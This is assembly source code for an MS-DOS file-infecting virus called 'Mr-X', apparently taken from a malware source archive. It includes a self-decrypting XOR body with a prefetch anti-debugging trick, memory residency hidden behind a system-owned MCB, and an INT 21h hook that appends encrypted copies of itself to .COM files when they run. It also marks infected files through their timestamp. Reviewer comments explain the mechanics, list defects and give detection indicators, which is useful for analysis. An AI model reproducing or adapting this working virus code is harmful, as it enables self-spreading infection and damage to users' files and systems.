vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.mr-x.asm

;******************************************************************************
;******************************************************************************
;**** Virus: .COM /noTBAV ****
;**** By: Ramthes Jones ****
;******************************************************************************
;******************************************************************************
; Assembler syntax note: this is MASM/TASM-style source (SEGMENT/ASSUME/ORG,
; LABEL, PROC/ENDP, DUP, OFFSET), not NASM, whatever the page is tagged as.
; Target: 16-bit real-mode MS-DOS .COM image, single segment, ORG 100h.
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE, SS:CODE
ORG 0100h
; DELTA = byte length of the virus body, from ONE (its first byte) to TWO
; (one past its last byte). Used as the copy/write length by the installer
; and the infector.
DELTA EQU (TWO - ONE)
; Entry point of the first-generation carrier. In an infected host the first
; three bytes are replaced by an E9 near JMP to the appended body (see
; BUFFER and the 3-byte write in INFECT_COM); here the jump is assembled
; directly. The explicit NOP presumably pads the stub to 3 bytes when the
; assembler emits a 2-byte short JMP.
START:
JMP VIR_START
NOP
; --- "host" program of the carrier: print MSG and exit via INT 20h. ---
; Reached only after RUN_COM copies NORMAL (three NOPs) back over the stub
; at 100h and RETFs to 100h.
MOV AH,09h
MOV DX,OFFSET MSG
PUSH CS
POP DS
INT 21h
INT 20h
; Text shown by the carrier only (Spanish: "Virus Mr-X activated!!! Please
; do not run any file. Heh, heh, heh..."). Runtime string, kept byte-for-byte.
MSG DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'
; ---------------------------------------------------------------------------
; VIR_START / ONE: first byte of the virus body (offset 0 of every copy).
; Decrypts the region [BEGIN-1, TWO) in place with a one-byte XOR key and
; then continues into the decrypted code at ATBV/BEGIN.
; Per-copy patched bytes in this block (offsets relative to ONE; written
; into each new copy by INFECT_COM):
;   ONE+1..2 : immediate of MOV BX,imm16 = load address of ONE in the host
;   ONE+20   : immediate of XOR AH,imm8  = the XOR key (INFECT_COM's [SI+20])
;   ONE+30   : INTFFh, the 2-byte MOV [SI],AH below, rewritten at run time
; ---------------------------------------------------------------------------
VIR_START:
ONE LABEL BYTE
MOV BX,015Dh ; BX = offset of ONE in the loaded image (015Dh in this carrier;
; rewritten per infected file by "MOV [SI + 1],AL / MOV [SI + 2],AH")
PUSH BX ; saved for RUN_COM / STAY_IN_MEMO, which POP it back
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1; known constant: first encrypted byte,
; relative to ONE (the -1 means the last byte of "INT 21h" at ATBV is
; inside the encrypted region as well)
ADD SI,BX ; SI = absolute offset of the encrypted region
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1; known constant: encrypted length
MOV DX,0FFCDh ; FFCD = little-endian bytes CD FF = the instruction INT 0FFh
CLI
; Decrypt loop. Each iteration writes INT 0FFh over the store instruction at
; INTFFh (ONE+30, the target of the [bx+30] writes) and restores it right
; after. NOTE(review): this looks like the classic prefetch-queue
; anti-debugging trick ("/noTBAV" in the header): a CPU that has already
; prefetched MOV [SI],AH executes the original store, while a
; single-stepping debugger/emulator executes the patched INT 0FFh instead.
; Behaviour on CPUs that detect self-modifying code is not established by
; this source -- confirm before relying on it.
BUCLE:
MOV AH,[SI]
XOR AH,00h ; the 00h immediate is the per-copy XOR key
DB 06 DUP (90h) ; 6 NOPs between the patching store and the patched site
MOV [bx+30],DX ; overwrite INTFFh with CD FF (INT 0FFh)
INTFFh LABEL WORD
MOV [SI],AH ; store the decrypted byte (this 2-byte word is INTFFh)
MOV [bx+30],2488h ; restore it: 2488h = bytes 88 24 = MOV [SI],AH
INC SI
LOOP BUCLE
STI
JMP ATBV
; JODER: terminate-process stub; no jump in this file targets it.
JODER:
MOV AH,4Ch
INT 21h
; ATBV: INT 21h/30h (get DOS version); the result is never used. Its second
; byte (21h) is the first byte of the encrypted region, so this instruction
; is only valid once the loop above has run.
ATBV:
MOV AH,30h
INT 21h
; ---------------------------------------------------------------------------
; BEGIN: first label inside the encrypted region. Residency probe: the
; resident hook answers INT 21h AX=0ACACh with AX=0CACAh (see GIVE_MARK).
; If it does, run the host; otherwise install the virus in memory first.
; ---------------------------------------------------------------------------
BEGIN:
MOV AX,0ACACh
INT 21h
CMP AX,0CACAh
JE RUN_COM
JMP STAY_IN_MEMO
; RUN_COM: restore the host's original first three bytes (saved in NORMAL)
; at CS:100h and transfer control there. Expects the offset of ONE on top
; of the stack (pushed by "PUSH BX" right after ONE).
RUN_COM:
PUSH CS
PUSH CS
POP DS
POP ES
POP BX ; BX = offset of ONE
MOV DI,100h
LEA SI,[(NORMAL - OFFSET ONE) + BX] ; SI = NORMAL in this copy
MOVSW
MOVSB ; 3 bytes: NORMAL -> CS:100h
PUSH CS
PUSH 0100h ; push imm16 (80186+ instruction)
RETF ; far "jump" to CS:0100h = host entry; registers are not restored
; STAY_IN_MEMO: go resident by carving a block at the top of conventional
; memory and hooking INT 21h:
;   1. shrink the PSP block to 0 paragraphs;
;   2. AH=4Ah with BX=0FFFFh fails and returns the maximum size in BX;
;   3. resize the PSP block to that maximum minus 61h paragraphs;
;   4. AH=48h allocates 60h paragraphs -- the hole left at the top;
;   5. set that block's MCB owner word to 0008h (the owner value DOS uses
;      for its own blocks) so the block is not released when the host's
;      PSP terminates;
;   6. copy DELTA bytes from ONE to offset 0 of the new segment;
;   7. save the current INT 21h vector into the copy and point INT 21h at
;      the copy's HOOK_21.
; 60h paragraphs = 1536 bytes must cover DELTA; the ";100h"/";101h" remarks
; suggest earlier values. None of these DOS calls is checked for failure.
STAY_IN_MEMO:
MOV AH,4Ah
XOR BX,BX
INT 21h ; resize own block to 0 paragraphs
MOV AH,4Ah
MOV BX,0FFFFh
INT 21h ; fails; BX = largest size available
SUB BX,61h ; was 101h: 60h for the copy + 1 paragraph for its MCB
MOV AH,4Ah
INT 21h ; resize own block to everything except the top 61h paragraphs
MOV AH,48h
MOV BX,60h ; was 100h: size of the resident block, in paragraphs
INT 21h ; AX = segment of the new block (no JC check)
MOV ES,AX
PUSH ES
DEC AX ; AX = segment of that block's MCB
MOV ES,AX
MOV ES:WORD PTR [0001h], 0008h ; MCB owner field := 0008h
POP ES ; ES = resident segment
PUSH CS
POP DS
POP SI ; SI = offset of ONE (pushed right after ONE) ...
PUSH SI ; ... and keep it on the stack for RUN_COM
XOR DI,DI
MOV CX,DELTA
CLD
REP MOVSB ; copy the whole body to ES:0
PUSH ES
POP DS ; DS = resident segment; (label - OFFSET ONE) addressing from here on
MOV AX,3521h
INT 21h ; ES:BX = current INT 21h vector
POP SI
PUSH SI
MOV DS:[INT21IP - OFFSET ONE],BX
MOV DS:[INT21CS - OFFSET ONE],ES ; saved into the resident copy
MOV AX,2521h
MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
INT 21h ; INT 21h := resident:HOOK_21
JMP RUN_COM
; ---------------------------------------------------------------------------
; HOOK_21: resident INT 21h handler.
;   AX=4B00h (EXEC) -> INFECT_COM: try to infect the program about to run,
;                      then chain to the original INT 21h.
;   AX=0ACACh       -> GIVE_MARK: residency reply, returns AX=0CACAh via
;                      IRET without calling DOS.
;   anything else   -> FIN: chain to the saved INT 21h vector.
; All registers and flags are pushed on entry and popped at FIN; the extra
; PUSH DS before PUSHF is undone by the final POP DS.
; DOS calls from inside the handler use PUSHF + far CALL through the saved
; vector (INT21IP/INT21CS), i.e. they bypass this hook.
; Defects visible in this code (documented, not fixed):
;   - after "PUSH CS / POP DS" (first read) DS no longer holds the caller's
;     filename segment, so the attribute restore at FINAL (AX=4301h with the
;     popped DX) runs with CS:DX on every path that modified the file;
;     infected files are therefore likely left with attribute 20h;
;   - when the first attribute change fails (JC FINAL_1) FINAL still issues
;     AH=3Eh with BX equal to the caller's BX, closing an arbitrary handle;
;   - AH=48h for the temporary buffer (150h paragraphs) is unchecked, and on
;     a failed write (JC FINAL) that buffer is never freed;
;   - only AX (low word) of the file size is used; no size limit is checked.
; ---------------------------------------------------------------------------
HOOK_21 PROC FAR
PUSH DS
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CMP AX,4B00h
JE INFECT_COM
CMP AX,0ACACh
JE GIVE_MARK
JMP FIN
; Reply to the residency probe: restore everything, set AX and return.
GIVE_MARK:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
MOV AX,0CACAh
IRET
; INFECT_COM: DS:DX = ASCIIZ path of the program passed to EXEC.
INFECT_COM:
PUSH AX
PUSH BX
PUSH DX
PUSH DS
PUSH ES
MOV AX, CS
MOV DS, AX
; Swap INT 24h (critical error) for HOOK_24 so disk/write-protect errors
; during infection are ignored instead of prompting the user.
MOV AX,3524h
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
MOV DS:[INT24IP - OFFSET ONE],BX
MOV DS:[INT24CS - OFFSET ONE],ES
MOV AX,2524h
MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
POP ES
POP DS
POP DX
POP BX
POP AX
PUSH DX ; keep the filename offset for the attribute restore at FINAL
; Save the file's attributes, then set them to 20h (archive only) so a
; read-only/hidden/system file can still be opened for writing.
MOV AX,4300h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX
MOV AX,4301h
MOV CX,20h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL_1 ; BX is the caller's BX, not a handle, on this path (see header)
; Open read/write; handle -> BX.
MOV AX,3D02h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSH AX
POP BX
; Read the first 2 bytes into NORMAL and skip files that start with "MZ"
; (EXE images): only plain .COM-format files are infected.
MOV AH,3Fh
MOV CX,2
PUSH CS
POP DS ; DS = CS from here on; the caller's DS is not restored before FINAL
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
XOR SI,SI
mov ax,cs:(normal - offset one)[si]
cmp ax,'ZM' ; word 'ZM' == bytes "MZ" in memory
je final_1
jmp conti
FINAL_1:
JMP FINAL
; Infection-marker check: already-infected files carry a time stamp whose
; 2-second field is 13 (= 26 seconds); skip those.
CONTI:
MOV AX,5700h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(HORA - OFFSET ONE)],CX
MOV CS:[(FECHA - OFFSET ONE)],DX
AND CL,00011111b ; this is the correct way to check
CMP CL,00001101b ; whether the seconds field is 26
JE FINAL_1
; Seek to 0 and read the original first 3 bytes into NORMAL.
XOR AL,AL
CALL F_42h
MOV AH,3Fh
MOV CX,3
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
; Seek to end: AX = file size (low word). BUFFER := E9, (size - 3), i.e. the
; near JMP from 103h to 100h+size, where the body will be appended.
MOV AL,02h
CALL F_42h
PUSH AX
SUB AX,3
MOV SI,1
MOV CS:(BUFFER - OFFSET ONE)[SI],AL
INC SI
MOV CS:(BUFFER - OFFSET ONE)[SI],AH
; Build the new copy in a temporary block of 150h paragraphs (unchecked).
PUSH BX
MOV AH,48h
MOV BX,150h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV ES,AX
POP BX
PUSH CS
POP DS
XOR SI,SI
MOV DI,SI
MOV CX,OFFSET TWO - OFFSET ONE
CLD
REP MOVSB ; temp:0 = copy of this body
PUSH ES
POP DS
POP AX ; compute the address at which
INC AH ; the virus body will start in the
XOR SI,SI ; infected file (100h + size) and
MOV [SI + 1],AL ; patch it into the MOV BX,imm16
MOV [SI + 2],AH ; at ONE+1 of the copy
; XOR key = DL (hundredths of a second) from INT 21h/2Ch; patched into the
; XOR AH,imm8 immediate at ONE+20 of the copy (a zero key is not rejected).
MOV AH,2Ch
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV [SI+20],DL
; Encrypt the same range the decryptor at ONE processes: [BEGIN-1, TWO).
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1
ENCRIPTO:
XOR ES:[SI],DL
INC SI
LOOP ENCRIPTO
; Append the encrypted copy (DELTA bytes from temp:0) at EOF.
MOV AH,40h
MOV CX,DELTA
XOR DX,DX
PUSH ES
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL ; the temp block is not freed on this path
MOV AH,49h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE] ; free the temp block (ES)
; Overwrite the host's first 3 bytes with the JMP in BUFFER.
XOR AL,AL
CALL F_42h
MOV AH,40h
MOV CX,3
MOV DX,(OFFSET BUFFER - OFFSET ONE)
PUSH CS
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
; Put the original date/time back, but force the seconds field to 26
; (00001101b) as the infection marker.
MOV AX,5701h
MOV CX,CS:[(HORA - OFFSET ONE)]
AND CL,11100000b
OR CL,00001101b
MOV DX,CS:[(FECHA - OFFSET ONE)]
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
FINAL:
MOV AH,3Eh ; close handle BX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,4301h
MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
POP DX ; filename offset; DS is no longer the caller's segment here
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
; Restore the original INT 24h vector.
MOV AX,2524h
MOV DX,CS:[INT24IP - OFFSET ONE]
MOV DS,CS:[INT24CS - OFFSET ONE]
PUSHF
CALL DWORD PTR CS:[INT21IP-OFFSET ONE]
; FIN: restore everything and chain to the original INT 21h.
FIN:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]
; F_42h: LSEEK (AH=42h) on handle BX to offset CX:DX = 0 relative to AL
; (0 = start of file, 2 = end of file). CWD clears DX because AH=42h keeps
; AX non-negative. Returns DX:AX = new position. Clobbers AH, CX, DX, flags.
F_42h PROC
MOV AH,42h
CWD
MOV CX,DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
RET
F_42h ENDP
HOOK_21 ENDP
; HOOK_24: replacement INT 24h (critical error) handler installed only while
; a file is being infected. Returns AL=0 ("ignore"), so disk errors during
; the write are suppressed instead of raising the "Abort, Retry, Fail?"
; prompt that would expose the activity.
HOOK_24 PROC
XOR AL,AL
IRET
HOOK_24 ENDP
; Resident data. Everything is addressed as (label - OFFSET ONE) because the
; resident and temporary copies are placed at offset 0 of their segments.
INT21IP DW 0 ; saved INT 21h vector (offset, segment); every DOS call in
INT21CS DW 0 ; HOOK_21 goes through it
INT24IP DW 0 ; saved INT 24h vector, restored at the end of INFECT_COM
INT24CS DW 0
INT17IP DW 0 ; unreferenced in this file (no INT 17h handling anywhere)
INT17CS DW 0
ATRIBUTOS DW 0 ; victim's original attributes (AX=4300h, CX)
HORA DW 0 ; victim's original time stamp (AX=5700h, CX)
FECHA DW 0 ; victim's original date stamp (AX=5700h, DX)
BUFFER DB 3 DUP(0E9h) ; E9 xx xx: near JMP written over the host's first 3
; bytes; only bytes 1-2 (the displacement) are ever patched
NORMAL DB 3 DUP(90h) ; host's original first 3 bytes (three NOPs in this
; carrier, so RUN_COM falls through to the MSG code after START)
HIDDEN_MSG DB "Ramthes. World Cup'98: ARGENTINA!!" ; author string, never referenced
TWO LABEL BYTE ; end of the body; DELTA = TWO - ONE
; Indicators supported by this source: INT 21h hooked from a 60h-paragraph
; block at the top of conventional memory whose MCB owner is 0008h;
; AX=0ACACh answered with 0CACAh; infected .COM files grow by DELTA bytes,
; start with E9, keep their date but get a time stamp with seconds = 26,
; and are likely left with attribute 20h (the restore at FINAL appears to
; use the wrong DS).
CODE ENDS
END START ; program entry: the 3-byte stub at 100h